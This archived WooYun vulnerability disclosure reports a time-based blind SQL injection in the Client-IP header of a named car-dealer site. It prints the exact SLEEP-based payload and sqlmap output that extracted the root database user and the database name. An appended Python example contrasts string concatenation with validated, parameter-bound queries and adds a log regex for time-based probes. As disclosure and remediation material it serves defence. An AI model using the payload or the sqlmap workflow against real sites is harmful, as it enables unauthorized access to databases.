WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-08-10: Details have been sent to the vendor and are awaiting the vendor's handling
2015-08-11: The vendor has confirmed; details are disclosed to the vendor only
2015-08-21: Details disclosed to core white hats and relevant domain experts
2015-08-31: Details disclosed to ordinary white hats
2015-09-10: Details disclosed to intern white hats
2015-09-25: Details disclosed to the public
A 汽车点评 site has a blind SQL injection
Injection point:

GET /d_admin/checkcodeimg.php HTTP/1.1
Host: dealer.xgo.com.cn
Client-IP: *

The Client-IP header is vulnerable to time-based blind injection.
Fed it to sqlmap: user: 'root'@'192.168.50.65', ROOT privileges!
[17:32:37] [INFO] resuming back-end DBMS 'mysql' 
[17:32:37] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))NNPs) AND 'RfGj'='RfGj
---
[17:32:37] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:32:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[17:32:37] [INFO] fetching database users
[17:32:37] [INFO] fetching number of database users
[17:32:37] [WARNING] time-based comparison requires larger statistical model, please wait............................. 
[17:32:45] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[17:32:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 1
[17:32:54] [INFO] retrieved: 'root'@'192.168.50
[17:39:40] [ERROR] invalid character detected. retrying...6
[17:40:51] [ERROR] invalid character detected. retrying..5'
database management system users [1]:
[*] 'root'@'192.168.50.65'
[17:41:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dealer.xgo.com.cn'
current-db: 'xgo_dealer'
[17:49:15] [INFO] parsing HTTP request from 'httpreqTest/dealer.xgo.com.cn-wvs.txt'
[17:49:15] [INFO] loading tamper script 'space2comment'
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] 
[17:49:17] [INFO] resuming back-end DBMS 'mysql' 
[17:49:17] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ' AND (SELECT * FROM (SELECT(SLEEP(10)))NNPs) AND 'RfGj'='RfGj
---
[17:49:17] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:49:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[17:49:17] [INFO] fetching current database
[17:49:17] [WARNING] time-based comparison requires larger statistical model, please wait............................. 
[17:49:24] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[17:49:34] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors x
[17:51:05] [ERROR] invalid character detected. retrying..go_dealer
current database: 'xgo_dealer'
[17:57:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/dealer.xgo.com.cn'
Filter or escape the input.
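As an added example, not code from the report nor from the site's own checkcodeimg.php, the following Python shows the fix this section recommends. It validates the Client-IP header as a literal IP address and binds it as a query parameter, places that beside the concatenation pattern the report describes, and runs a small check over constructed log lines that flags header values carrying time-based probes. It uses sqlite3 in place of MySQL, so SLEEP() is not defined there and the injected text surfaces as a database error instead of a delay; the table name, column names and log format are assumptions.

```python
import ipaddress
import re
import sqlite3

# The header payload exactly as shown in the sqlmap output of the report.
REPORTED_PAYLOAD = "' AND (SELECT * FROM (SELECT(SLEEP(5)))NNPs) AND 'RfGj'='RfGj"


def validate_client_ip(header_value):
    """Return the canonical form of a literal IPv4/IPv6 address, or None.

    Only a bare address is accepted: quotes, parentheses, SQL keywords or
    anything else that is not an address fails ipaddress parsing and is rejected.
    """
    if header_value is None:
        return None
    try:
        return str(ipaddress.ip_address(header_value.strip()))
    except ValueError:
        return None


def setup_db():
    """In-memory stand-in for the dealer database (table and columns are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE checkcode_log (ip TEXT, code TEXT)")
    conn.executemany(
        "INSERT INTO checkcode_log VALUES (?, ?)",
        [("10.0.0.1", "a1b2"), ("192.168.50.65", "z9y8")],  # constructed rows
    )
    conn.commit()
    return conn


def lookup_unsafe(conn, header_value):
    """The pattern the report describes: header text concatenated into SQL.

    Returns the matching codes, or the database error text when the header
    changed the statement (which is how an injected SLEEP() reaches the DBMS).
    """
    sql = "SELECT code FROM checkcode_log WHERE ip = '" + header_value + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        return "db-error: " + str(exc)


def lookup_safe(conn, header_value):
    """Hardened form: validate the header as an IP, then bind it as a parameter."""
    ip = validate_client_ip(header_value)
    if ip is None:
        return []  # rejected before any SQL is built
    rows = conn.execute("SELECT code FROM checkcode_log WHERE ip = ?", (ip,))
    return [row[0] for row in rows]


# Delay functions used by time-based blind probes across common DBMSs.
TIME_BASED_RE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR\s+DELAY)\b", re.IGNORECASE)

# Constructed access-log lines in an assumed format that records the Client-IP header.
SAMPLE_LOG = [
    'GET /d_admin/checkcodeimg.php client_ip="192.168.50.65"',
    f'GET /d_admin/checkcodeimg.php client_ip="{REPORTED_PAYLOAD}"',
    'GET /d_admin/checkcodeimg.php client_ip="not-an-ip"',
]


def flag_suspicious_headers(log_lines):
    """Return (line number, label) for every Client-IP value that is not a literal IP."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = re.search(r'client_ip="([^"]*)"', line)
        if match is None or validate_client_ip(match.group(1)) is not None:
            continue
        label = "time-based-sqli" if TIME_BASED_RE.search(match.group(1)) else "malformed"
        findings.append((number, label))
    return findings


if __name__ == "__main__":
    db = setup_db()
    print("unsafe:", lookup_unsafe(db, REPORTED_PAYLOAD))
    print("safe:  ", lookup_safe(db, REPORTED_PAYLOAD))
    print("log:   ", flag_suspicious_headers(SAMPLE_LOG))
```

Client-IP is set by whoever sends the request, so it is untrusted input like any query parameter, even when it is only used for logging. Validating it as an address is the "filter" the fix suggests; binding it as a parameter is what makes escaping unnecessary, because the value is never parsed as SQL. The log check is a cheap way to spot the same probe pattern in existing access logs.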
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-08-11 09:14
Thanks, a fix has been scheduled.
None yet